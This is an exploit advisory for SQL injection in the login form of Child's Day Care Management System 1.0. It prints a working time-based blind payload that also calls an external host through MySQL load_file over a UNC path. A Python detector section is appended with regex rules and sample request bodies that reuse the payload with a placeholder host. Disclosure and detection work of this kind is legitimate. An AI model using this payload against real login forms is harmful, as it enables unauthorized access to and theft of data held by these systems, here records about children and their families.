## Title: Child's Day Care Management System 1.0 SQL - Injection
## Author: nu11secur1ty
## Date: 12.16.2021
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html

## Description:
The `username` parameter in Login.php of Child's Day Care Management System 1.0 appears to be vulnerable to SQL injection attacks.
The payload `'+(select load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+'` was submitted in the username parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
This system is also vulnerable to SQL-Injection-Bypass-Authentication and XSS-Stored attacks.
An attacker can retrieve all information from the system by using these vulnerabilities!

Status: CRITICAL

[+] Payload:

```mysql
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=zCAMOHlX'+(select load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+'' AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND 'wBYn'='wBYn&password=a6O!j4g!Z5
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Child's-Day-Care-Management-System)

## Proof and Exploit:
[href](https://streamable.com/tvbuoi)

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty
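
A defender-side check for the markers in the payload above (a sub-query, a `load_file` call on a UNC path, and a `SLEEP` delay), as an added example that is not part of the original advisory: it parses a form-encoded login body and reports which rules the `username` field triggers. The rule names, the function name and the sample request bodies are constructed for illustration, and the sample uses a placeholder host.

```python
import re
from urllib.parse import parse_qs

# Rules modelled on the payload shown in the advisory (names are hypothetical).
RULES = {
    # load_file() pointed at a UNC path: '\\host\share' or the escaped '\\\\host\\share'
    "load_file_unc": re.compile(r"load_file\s*\(\s*['\"]\\{2,}", re.I),
    # a parenthesised SELECT embedded in a value that should be a plain login name
    "subquery": re.compile(r"\(\s*select\b", re.I),
    # time-based blind probe: SLEEP(<seconds>)
    "time_based_sleep": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
}


def inspect_login_body(body: str, field: str = "username") -> list[str]:
    """Return the sorted names of the rules triggered by `field` in a
    application/x-www-form-urlencoded request body."""
    # parse_qs percent-decodes and turns '+' into a space, so encoded and
    # unencoded variants of the same payload are matched alike.
    values = parse_qs(body, keep_blank_values=True).get(field, [])
    return sorted(
        name for name, rx in RULES.items() if any(rx.search(v) for v in values)
    )


# Constructed sample bodies. The first mirrors the structure of the advisory's
# payload with a placeholder host; the other two are ordinary logins.
SAMPLE_BODIES = [
    r"username=zCAMOHlX'+(select load_file('\\\\oob.example.test\\ztd'))+''"
    r" AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND 'wBYn'='wBYn&password=x",
    "username=admin&password=Secret%2B1",
    "username=o'brien&password=x",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        hits = inspect_login_body(body)
        print("ALERT" if hits else "ok   ", hits, body[:60])
```

Pattern matching of this kind is for triaging request logs; the flaw itself is closed by binding `username` as a parameter in a prepared statement instead of concatenating it into the query.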